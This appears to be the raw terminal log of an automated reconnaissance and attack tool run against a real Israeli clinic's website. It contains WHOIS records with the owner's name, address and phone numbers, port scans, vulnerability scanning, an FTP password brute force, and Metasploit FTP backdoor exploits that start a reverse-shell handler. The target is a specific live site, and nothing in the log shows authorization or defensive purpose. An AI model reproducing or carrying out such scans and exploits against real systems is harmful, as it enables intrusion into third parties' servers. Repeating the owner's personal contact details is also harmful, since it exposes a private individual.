- % or (2) enable high volume, automated, electronic processes that
- % apply to ISOC-IL (or its systems).
- % ISOC-IL reserves the right to modify these terms at any time.
- % By submitting this query, you agree to abide by this policy.
- query: doctorarik.co.il
- reg-name: doctorarik
- domain: doctorarik.co.il
- descr: Arik Weisbord
- descr: A.D. Gordon 14
- descr: Herzelya
- descr: 4643301
- descr: Israel
- phone: +972 54 4277997
- fax-no: +972 9 9552093
- e-mail: drarik AT netvision.net.il
- admin-c: DT-AW7749-IL
- tech-c: DT-AW7749-IL
- zone-c: DT-AW7749-IL
- nserver: ns1.dtnt.info
- nserver: ns2.dtnt.info
- validity: 03-04-2018
- DNSSEC: unsigned
- status: Transfer Locked
- changed: domain-registrar AT isoc.org.il 20160403 (Assigned)
- person: Arik Weisbord
- address: Arik Weisbord
- address: A.D. Gordon 14
- address: Herzelya
- address: 4643301
- address: Israel
- phone: +972 54 4277997
- fax-no: +972 9 9552093
- e-mail: drarik AT netvision.net.il
- nic-hdl: DT-AW7749-IL
- changed: domain-registrar AT isoc.org.il 20160403
- registrar name: Domain The Net Technologies Ltd
- registrar info: http://www.domainthenet.com
- % Rights to the data above are restricted by copyright.
- G E O I P L O O K U P
- =========================
- [i] IP Address: 62.219.91.10
- [i] Country: IL
- [i] State: N/A
- [i] City: N/A
- [i] Latitude: 31.500000
- [i] Longitude: 34.750000
- H T T P H E A D E R S
- =======================
- [i] HTTP/1.1 301 Moved Permanently
- [i] Content-Type: text/html; charset=UTF-8
- [i] Location: http://www.doctorarik.co.il/
- [i] Server: Microsoft-IIS/7.5
- [i] X-Powered-By: ASP.NET
- [i] X-Powered-By-Plesk: PleskWin
- [i] Date: Sun, 31 Dec 2017 04:17:21 GMT
- [i] Connection: close
- [i] Content-Length: 151
- [i] HTTP/1.1 200 OK
- [i] Content-Type: text/html; charset=UTF-8
- [i] Server: Microsoft-IIS/7.5
- [i] X-Pingback: http://www.doctorarik.co.il/xmlrpc.php
- [i] Set-Cookie: PHPSESSID=009994e511dd64fd22a381fed060f747; path=/
- [i] X-Powered-By: ASP.NET
- [i] X-Powered-By-Plesk: PleskWin
- [i] Date: Sun, 31 Dec 2017 04:17:22 GMT
- [i] Connection: close
- [i] Content-Length: 19894
- D N S L O O K U P
- ===================
- doctorarik.co.il. 10799 IN A 62.219.91.10
- doctorarik.co.il. 10799 IN MX 10 mail.doctorarik.co.il.
- doctorarik.co.il. 10799 IN MX 50 mail.dtnt.info.
- doctorarik.co.il. 10799 IN SOA ns1.dtnt.info.doctorarik.co.il. support.dtnt.com.doctorarik.co.il. 2015040700 5400 3600 2419199 3600
- doctorarik.co.il. 21599 IN NS ns1.dtnt.info.
- doctorarik.co.il. 21599 IN NS ns3.dtnt.info.
- doctorarik.co.il. 21599 IN NS ns2.dtnt.info.
- S U B N E T C A L C U L A T I O N
- ====================================
- Address = 62.219.91.10
- Network = 62.219.91.10 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 62.219.91.10 - 62.219.91.10 }
- N M A P P O R T S C A N
- ============================
- Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-31 04:17 UTC
- Nmap scan report for doctorarik.co.il (62.219.91.10)
- Host is up (0.14s latency).
- rDNS record for 62.219.91.10: cust-62-219-91-10.cust.bezeqint.net
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Microsoft ftpd
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 25/tcp filtered smtp
- 80/tcp open http Microsoft IIS httpd 7.5
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
- 445/tcp filtered microsoft-ds
- 3389/tcp filtered ms-wbt-server
- Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 15.81 seconds
- S U B - D O M A I N F I N D E R
- ==================================
- [i] Total Subdomains Found : 1
- [+] Subdomain: mail.doctorarik.co.il
- [-] IP: 62.219.91.130
- [!] IP Address : 62.219.91.10
- [!] Server: Microsoft-IIS/7.5
- [!] Powered By: ASP.NET
- [-] Clickjacking protection is not in place.
- [+] Operating System : Windows
- [!] www.doctorarik.co.il doesn't seem to use a CMS
- [+] Honeypot Probabilty: 0%
- ----------------------------------------
- [+] Robots.txt retrieved
- User-agent: *
- Disallow:
- ----------------------------------------
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Microsoft ftpd
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 25/tcp filtered smtp
- 80/tcp open http Microsoft IIS httpd 7.5
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
- 445/tcp filtered microsoft-ds
- 3389/tcp filtered ms-wbt-server
- ----------------------------------------
- [+] DNS Records
- ns2.dtnt.info. (62.219.91.150) AS8551 Bezeq International Israel
- ns1.dtnt.info. (62.219.91.139) AS8551 Bezeq International Israel
- ns3.dtnt.info. (52.36.225.219) AS16509 Amazon.com, Inc. United States
- [+] MX Records
- 50 (62.219.91.130) AS8551 Bezeq International Israel
- [+] MX Records
- 10 (62.219.91.130) AS8551 Bezeq International Israel
- [+] Host Records (A)
- www.doctorarik.co.ilHTTP: (cust-62-219-91-10.cust.bezeqint.net) (62.219.91.10) AS8551 Bezeq International Israel
- [+] TXT Records
- [+] DNS Map: https://dnsdumpster.com/static/map/www.doctorarik.co.il.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- No emails found
- No hosts found
- [+] Virtual hosts:
- -----------------
- [>] Crawling the target for fuzzable URLs
- Vulnerability Entries: 611
- Last update: February 2, 2012
- Use "update" option to update the database
- Use "check" option to check the scanner update
- Use "download" option to download the scanner latest version package
- Use svn co to update the scanner and the database
- svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan
- Target: http://doctorarik.co.il
- Server: Microsoft-IIS/7.5
- X-Powered-By: ASP.NET
- ## Checking if the target has deployed an Anti-Scanner measure
- [!] Scanning Passed ..... OK
- ## Detecting Joomla! based Firewall ...
- [!] A Joomla! RS-Firewall (com_rsfirewall/com_firewall) is detected.
- [!] The vulnerability probing may be logged and protected.
- [!] A Joomla! J-Firewall (com_jfw) is detected.
- [!] The vulnerability probing may be logged and protected.
- [!] A SecureLive Joomla!(mod_securelive/com_securelive) firewall is detected.
- [!] The vulnerability probing may be logged and protected.
- [!] A SecureLive Joomla! firewall is detected.
- [!] The vulnerability probing may be logged and protected.
- [!] FWScript(from firewallscript.com) is likely to be used.
- [!] The vulnerability probing may be logged and protected.
- [!] A Joomla! security scanner (com_joomscan/com_joomlascan) is detected.
- [!] It is likely that webmaster routinely checks insecurities.
- [!] A security scanner (com_securityscanner/com_securityscan) is detected.
- [!] A Joomla! jSecure Authentication is detected.
- [!] You need additional secret key to access /administrator directory
- [!] Default is jSecure like /administrator/?jSecure ;)
- [!] A Joomla! GuardXT Security Component is detected.
- [!] It is likely that webmaster routinely checks for insecurities.
- [!] A Joomla! JoomSuite Defender is detected.
- [!] The vulnerability probing may be logged and protected.
- ## Fingerprinting in progress ...
- ~Unable to detect the version. Is it sure a Joomla?
- ## Fingerprinting done.
- Vulnerabilities Discovered
- ==========================
- # 1
- Info -> Generic: htaccess.txt has not been renamed.
- Versions Affected: Any
- Check: /htaccess.txt
- Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
- Vulnerable? Yes
- # 379
- Info -> Component: com_rss DOS Vulnerability
- Versions effected: Joomla! <= 1.0.7
- Check: /components/com_rss/
- Exploit: /index2.php?option=com_rss&feed=test
- Vulnerable? Yes
- [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +[0m
- Server: 192.168.1.254
- Address: 192.168.1.254#53
- Non-authoritative answer:
- Name: doctorarik.co.il
- Address: 62.219.91.10
- doctorarik.co.il has address 62.219.91.10
- doctorarik.co.il mail is handled by 10 mail.doctorarik.co.il.
- doctorarik.co.il mail is handled by 50 mail.dtnt.info.
- [92m + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +[0m
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is doctorarik.co.il
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 62.219.91.10. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 62.219.91.10. Module test failed
- [-] No distance calculation. 62.219.91.10 appears to be dead or no ports known
- [+] Host: 62.219.91.10 is down (Guess probability: 0%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- [92m + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +[0m
- % The data in the WHOIS database of the .il registry is provided
- % by ISOC-IL for information purposes, and to assist persons in
- % obtaining information about or related to a domain name
- % registration record. ISOC-IL does not guarantee its accuracy.
- % By submitting a WHOIS query, you agree that you will use this
- % Data only for lawful purposes and that, under no circumstances
- % will you use this Data to: (1) allow, enable, or otherwise
- % support the transmission of mass unsolicited, commercial
- % advertising or solicitations via e-mail (spam);
- % or (2) enable high volume, automated, electronic processes that
- % apply to ISOC-IL (or its systems).
- % ISOC-IL reserves the right to modify these terms at any time.
- % By submitting this query, you agree to abide by this policy.
- query: doctorarik.co.il
- reg-name: doctorarik
- domain: doctorarik.co.il
- descr: Arik Weisbord
- descr: A.D. Gordon 14
- descr: Herzelya
- descr: 4643301
- descr: Israel
- phone: +972 54 4277997
- fax-no: +972 9 9552093
- e-mail: drarik AT netvision.net.il
- admin-c: DT-AW7749-IL
- tech-c: DT-AW7749-IL
- zone-c: DT-AW7749-IL
- nserver: ns1.dtnt.info
- nserver: ns2.dtnt.info
- validity: 03-04-2018
- DNSSEC: unsigned
- status: Transfer Locked
- changed: domain-registrar AT isoc.org.il 20160403 (Assigned)
- person: Arik Weisbord
- address: Arik Weisbord
- address: A.D. Gordon 14
- address: Herzelya
- address: 4643301
- address: Israel
- phone: +972 54 4277997
- fax-no: +972 9 9552093
- e-mail: drarik AT netvision.net.il
- nic-hdl: DT-AW7749-IL
- changed: domain-registrar AT isoc.org.il 20160403
- registrar name: Domain The Net Technologies Ltd
- registrar info: http://www.domainthenet.com
- % Rights to the data above are restricted by copyright.
- [92m + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +[0m
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.7 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- Full harvest..
- [-] Searching in Google..
- Searching 0 results...
- Searching 100 results...
- Searching 200 results...
- [-] Searching in PGP Key server..
- [-] Searching in Bing..
- Searching 50 results...
- Searching 100 results...
- Searching 150 results...
- Searching 200 results...
- [-] Searching in Exalead..
- Searching 50 results...
- Searching 100 results...
- Searching 150 results...
- Searching 200 results...
- Searching 250 results...
- [+] Emails found:
- ------------------
- No emails found
- [+] Hosts found in search engines:
- ------------------------------------
- [-] Resolving hostnames IPs...
- 62.219.91.10:www.doctorarik.co.il
- [+] Virtual hosts:
- ==================
- 62.219.91.10 www.metrology.co.il
- 62.219.91.10 www.bonbi.co.il
- 62.219.91.10 zantkeren.co.il
- 62.219.91.10 www.askal.co.il
- 62.219.91.10 www.joles.co.il
- 62.219.91.10 www.zuk-m.co.il
- 62.219.91.10 www.hotel-dead-sea.com
- 62.219.91.10 fr.informationvine.com
- 62.219.91.10 www.shabat-chatan.co.il
- 62.219.91.10 www.lahav-y.co.il
- 62.219.91.10 www.servadio
- 62.219.91.10 tami-4.com
- 62.219.91.10 www.chortkow.org.il
- 62.219.91.10 zahi.co.il
- 62.219.91.10 www.hotel-funday.co.il
- 62.219.91.10 www.m-bol.co.il
- 62.219.91.10 synergy-it.co.il
- 62.219.91.10 kdc.co.il
- 62.219.91.10 batyarotem.co.il
- 62.219.91.10 www.tbh.co.il
- 62.219.91.10 www.tarsis-agrichem.co.il
- 62.219.91.10 www.israel-tours-operator.com
- 62.219.91.10 www.rdpeled
- 62.219.91.10 4x4bike.co.il
- 62.219.91.10 masad.co.il
- 62.219.91.10 www.bedouintent.co.il
- 62.219.91.10 fac.co.il
- 62.219.91.10 zbcigar.co.il
- 62.219.91.10 www.romantic-funday.co.il
- 62.219.91.10 www.doctorarik.co.il
- 62.219.91.10 www.batei-malon-eilat.co.il
- 62.219.91.10 servadio.co.il
- 62.219.91.10 www.nofesh-baaretz.co.il
- 62.219.91.10 rshein-arc.co.il
- 62.219.91.10 www.rshein-arc.co.il
- 62.219.91.10 www.eilat-groups.co.il
- 62.219.91.10 www.horses.org.il
- 62.219.91.10 gibush.co.il
- 62.219.91.10 www.keshet-enoshit.co.il
- 62.219.91.10 www.fundays.co.il
- 62.219.91.10 www.gibush.co.il
- 62.219.91.10 www.conferences.co.il
- 62.219.91.10 www.yemei-gibush.co.il
- 62.219.91.10 www.y-huledet.co.il
- 62.219.91.10 habaitshelanat.co.il
- 62.219.91.10 www.deadsea-pinuk.co.il
- 62.219.91.10 www.matkot1.co.il
- ******************************************************
- * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
- * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
- * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
- * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
- * |___/ *
- * Metagoofil Ver 2.2 *
- * Christian Martorella *
- * Edge-Security.com *
- * cmartorella_at_edge-security.com *
- ******************************************************
- [-] Starting online search...
- [-] Searching for doc files, with a limit of 200
- Searching 100 results...
- Searching 200 results...
- Results: 0 files found
- Starting to download 50 of them:
- ----------------------------------------
- [-] Searching for pdf files, with a limit of 200
- Searching 100 results...
- Searching 200 results...
- Results: 0 files found
- Starting to download 50 of them:
- ----------------------------------------
- [-] Searching for xls files, with a limit of 200
- Searching 100 results...
- Searching 200 results...
- Results: 0 files found
- Starting to download 50 of them:
- ----------------------------------------
- [-] Searching for csv files, with a limit of 200
- Searching 100 results...
- Searching 200 results...
- Results: 0 files found
- Starting to download 50 of them:
- ----------------------------------------
- [-] Searching for txt files, with a limit of 200
- Searching 100 results...
- Searching 200 results...
- Results: 0 files found
- Starting to download 50 of them:
- ----------------------------------------
- processing
- user
- email
- [+] List of users found:
- --------------------------
- [+] List of software found:
- -----------------------------
- [+] List of paths and servers found:
- ---------------------------------------
- [+] List of e-mails found:
- ----------------------------
- [92m + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +[0m
- ; <<>> DiG 9.11.2-5-Debian <<>> -x doctorarik.co.il
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 1707
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;il.co.doctorarik.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102519 1800 900 604800 3600
- ;; Query time: 105 msec
- ;; SERVER: 192.168.1.254#53(192.168.1.254)
- ;; WHEN: Sat Dec 30 23:17:21 EST 2017
- ;; MSG SIZE rcvd: 126
- dnsenum VERSION:1.2.4
- [1;34m
- ----- doctorarik.co.il -----
- [0m[1;31m
- Host's addresses:
- __________________
- [0mdoctorarik.co.il. 10686 IN A 62.219.91.10
- [1;31m
- Name Servers:
- ______________
- [0mns3.dtnt.info. 28800 IN A 52.36.225.219
- ns2.dtnt.info. 28799 IN A 62.219.91.150
- ns1.dtnt.info. 28799 IN A 62.219.91.139
- [1;31m
- Mail (MX) Servers:
- ___________________
- [0mmail.doctorarik.co.il. 10800 IN A 62.219.91.130
- mail.dtnt.info. 28800 IN A 62.219.91.130
- [1;31m
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- [0m
- Trying Zone Transfer for doctorarik.co.il on ns3.dtnt.info ...
- Trying Zone Transfer for doctorarik.co.il on ns2.dtnt.info ...
- Trying Zone Transfer for doctorarik.co.il on ns1.dtnt.info ...
- brute force file not specified, bay.
- [92m + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +[0m
- [91m
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|[0m[93m
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [94m[-] Enumerating subdomains now for doctorarik.co.il[0m
- [93m[-] verbosity is enabled, will show the subdomains results in realtime[0m
- [92m[-] Searching now in Baidu..[0m
- [92m[-] Searching now in Yahoo..[0m
- [92m[-] Searching now in Google..[0m
- [92m[-] Searching now in Bing..[0m
- [92m[-] Searching now in Ask..[0m
- [92m[-] Searching now in Netcraft..[0m
- [92m[-] Searching now in DNSdumpster..[0m
- [92m[-] Searching now in Virustotal..[0m
- [92m[-] Searching now in ThreatCrowd..[0m
- [92m[-] Searching now in SSL Certificates..[0m
- [92m[-] Searching now in PassiveDNS..[0m
- [91mYahoo: [0mwww.doctorarik.co.il
- [91mVirustotal: [0mwww.doctorarik.co.il
- [91mDNSdumpster: [0mmail.doctorarik.co.il
- [93m[-] Saving results to file: [0m[91m/usr/share/sniper/loot/domains/domains-doctorarik.co.il.txt[0m
- [93m[-] Total Unique Subdomains Found: 2[0m
- [92mwww.doctorarik.co.il[0m
- [92mmail.doctorarik.co.il[0m
- [91m ╔═╗╦═╗╔╦╗╔═╗╦ ╦[0m
- [91m ║ ╠╦╝ ║ ╚═╗╠═╣[0m
- [91m ╚═╝╩╚═ ╩o╚═╝╩ ╩[0m
- [91m + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +[0m
- [94m
- [91m [+] Domains saved to: /usr/share/sniper/loot/domains/domains-doctorarik.co.il-full.txt
- [0m
- [92m + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +[0m
- [92m + -- ----------------------------=[Checking Email Security]=----------------- -- +[0m
- [92m + -- ----------------------------=[Pinging host]=---------------------------- -- +[0m
- PING doctorarik.co.il (62.219.91.10) 56(84) bytes of data.
- --- doctorarik.co.il ping statistics ---
- 1 packets transmitted, 0 received, 100% packet loss, time 0ms
- [92m + -- ----------------------------=[Running TCP port scan]=------------------- -- +[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-30 23:18 EST
- Warning: 62.219.91.10 giving up on port because retransmission cap hit (2).
- Nmap scan report for doctorarik.co.il (62.219.91.10)
- Host is up (0.43s latency).
- rDNS record for 62.219.91.10: cust-62-219-91-10.cust.bezeqint.net
- Not shown: 468 filtered ports, 1 closed port
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 80/tcp open http
- 443/tcp open https
- 8443/tcp open https-alt
- Nmap done: 1 IP address (1 host up) scanned in 14.04 seconds
- [92m + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +[0m
- [93m + -- --=[Port 21 opened... running tests...[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-30 23:18 EST
- Nmap scan report for doctorarik.co.il (62.219.91.10)
- Host is up (0.19s latency).
- rDNS record for 62.219.91.10: cust-62-219-91-10.cust.bezeqint.net
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Microsoft ftpd
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 1410 guesses in 182 seconds, average tps: 7.4
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|phone
- Running (JUST GUESSING): Microsoft Windows 2008|7|8.1|Phone|Vista (98%)
- OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
- Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (98%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8.1 R1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 13 hops
- Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 283.28 ms 10.13.0.1
- 2 300.20 ms 37.187.24.253
- 3 292.21 ms 10.50.225.61
- 4 296.97 ms 10.17.129.40
- 5 287.79 ms 10.73.0.50
- 6 ...
- 7 303.72 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
- 8 391.49 ms 80.249.209.46
- 9 397.77 ms bzq-179-124-101.cust.bezeqint.net (212.179.124.101)
- 10 381.01 ms bzq-219-189-213.dsl.bezeqint.net (62.219.189.213)
- 11 180.04 ms bzq-218-77-74.red.bezeqint.net (81.218.77.74)
- 12 180.76 ms 62.219.24.28
- 13 173.76 ms cust-62-219-91-10.cust.bezeqint.net (62.219.91.10)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 204.62 seconds
- [0m[36m , ,
- / \
- ((__---,,,---__))
- (_) O O (_)_________
- \ _ / |\
- o_o \ M S F | \
- \ _____ | *
- ||| WW|||
- ||| |||
- [0m
- =[ [33mmetasploit v4.16.26-dev[0m ]
- + -- --=[ 1714 exploits - 975 auxiliary - 300 post ]
- + -- --=[ 507 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- [0m[0mRHOST => doctorarik.co.il
- [0mRHOSTS => doctorarik.co.il
- [0m[1m[34m[*][0m doctorarik.co.il:21 - Banner: 220 Microsoft FTP Service
- [1m[34m[*][0m doctorarik.co.il:21 - USER: 331 Password required for 8sP:).
- [1m[34m[*][0m Exploit completed, but no session was created.
- [0m[0m[1m[34m[*][0m Started reverse TCP double handler on 10.13.2.94:4444
- [1m[34m[*][0m doctorarik.co.il:21 - Sending Backdoor Command
- [1m[34m[*][0m Exploit completed, but no session was created.
- [0m[91m + -- --=[Port 22 closed... skipping.[0m
- [91m + -- --=[Port 23 closed... skipping.[0m
- [91m + -- --=[Port 25 closed... skipping.[0m
- [91m + -- --=[Port 53 closed... skipping.[0m
- [91m + -- --=[Port 79 closed... skipping.[0m
- [93m + -- --=[Port 80 opened... running tests...[0m
- [92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://doctorarik.co.il
- Generic Detection results:
- The site http://doctorarik.co.il seems to be behind a WAF or some sort of security solution
- Reason: Blocking is being done at connection/packet level.
- Number of requests: 9
- [92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
- [1m[34mhttp://doctorarik.co.il[0m [301 Moved Permanently] [1m[37mCountry[0m[[37mISRAEL[0m][[1m[31mIL[0m], [1m[37mHTTPServer[0m[[1m[36mMicrosoft-IIS/7.5[0m], [1m[37mIP[0m[[37m62.219.91.10[0m], [1m[37mMicrosoft-IIS[0m[[1m[32m7.5[0m], [1m[37mRedirectLocation[0m[[37mhttp://www.doctorarik.co.il/[0m], [1m[37mTitle[0m[[1m[33mDocument Moved[0m], [1m[37mUncommonHeaders[0m[[37mx-powered-by-plesk[0m], [1m[37mX-Powered-By[0m[[37mASP.NET[0m]
- [1m[34mhttp://www.doctorarik.co.il/[0m [200 OK] [1m[37mCookies[0m[[37mPHPSESSID[0m], [1m[37mCountry[0m[[37mISRAEL[0m][[1m[31mIL[0m], [1m[37mHTTPServer[0m[[1m[36mMicrosoft-IIS/7.5[0m], [1m[37mIP[0m[[37m62.219.91.10[0m], [1m[37mJQuery[0m[[1m[32m1[0m], [1m[37mMicrosoft-IIS[0m[[1m[32m7.5[0m], [1m[37mScript[0m[[37mtext/javascript[0m], [1m[37mTitle[0m[[1m[33mהרזיה, הרזיה בריאה, הרזיה נכונה- מרפאת הרזיה של ד"ר אריק ויסבורד[0m], [1m[37mUncommonHeaders[0m[[37mx-powered-by-plesk[0m], [1m[37mWordPress[0m, [1m[37mX-Powered-By[0m[[37mASP.NET[0m], [1m[37mx-pingback[0m[[37mhttp://www.doctorarik.co.il/xmlrpc.php[0m]
- [94m __ ______ _____ [0m
- [94m \ \/ / ___|_ _|[0m
- [94m \ /\___ \ | | [0m
- [94m / \ ___) || | [0m
- [94m /_/\_|____/ |_| [0m
- [94m+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield[0m
- [94m+ -- --=[Target: doctorarik.co.il:80[0m
- [92m + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +[0m
- [94m+ -- --=[Checking if X-Content options are enabled on doctorarik.co.il...[0m [93m
- [94m+ -- --=[Checking if X-Frame options are enabled on doctorarik.co.il...[0m [93m
- [94m+ -- --=[Checking if X-XSS-Protection header is enabled on doctorarik.co.il...[0m [93m
- [94m+ -- --=[Checking HTTP methods on doctorarik.co.il...[0m [93m
- [94m+ -- --=[Checking if TRACE method is enabled on doctorarik.co.il...[0m [93m
- [94m+ -- --=[Checking for META tags on doctorarik.co.il...[0m [93m
- [94m+ -- --=[Checking for open proxy on doctorarik.co.il...[0m [93m
- ' <span class="separator"></span> <a class="copyright" href="http://www.parallels.com">© 1999-2013. Parallels IP Holdings GmbH.<br />All rights reserved.</a>');
- }
- </script>
- </div>
- </div>
- <script>(function(){var D=document,W=window;function A(){if(W.plesk){return;}W.plesk=1;if(D.getElementsByTagName){var S=D.getElementsByTagName("head")[0].appendChild(D.createElement("script"));S.setAttribute("src","http://promo.parallels.com/js/promo.plesk.js")}}if(D.addEventListener){D.addEventListener("DOMContentLoaded",A,false)}/*@cc_on D.write("\x3cscript id=\"_IE_onload\" defer=\"defer\" src=\"javascript:void(0)\">\x3c\/script>");(D.getElementById("_IE_onload")).onreadystatechange=function(){if(this.readyState=="complete"){A()}};@*/if(/WebK/i.test(navigator.userAgent)){var C=setInterval(function(){if(/loaded|complete/.test(D.readyState)){clearInterval(C);A()}},10)}W[/*@cc_on !@*/0?'attachEvent':'addEventListener'](/*@cc_on 'on'+@*/'load',A,false)})()</script>
- </body>
- </html>
- [94m+ -- --=[Enumerating software on doctorarik.co.il...[0m [93m
- Server: Microsoft-IIS/7.5
- X-Powered-By: ASP.NET
- X-Powered-By-Plesk: PleskWin
- [94m+ -- --=[Checking if Strict-Transport-Security is enabled on doctorarik.co.il...[0m [93m
- [94m+ -- --=[Checking for Flash cross-domain policy on doctorarik.co.il...[0m [93m
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.doctorarik.co.il/crossdomain.xml">here</a></body>
- [94m+ -- --=[Checking for Silverlight cross-domain policy on doctorarik.co.il...[0m [93m
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.doctorarik.co.il/clientaccesspolicy.xml">here</a></body>
- [94m+ -- --=[Checking for HTML5 cross-origin resource sharing on doctorarik.co.il...[0m [93m
- [94m+ -- --=[Retrieving robots.txt on doctorarik.co.il...[0m [93m
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.doctorarik.co.il/robots.txt">here</a></body>
- [94m+ -- --=[Retrieving sitemap.xml on doctorarik.co.il...[0m [93m
- <head><title>Document Moved</title></head>
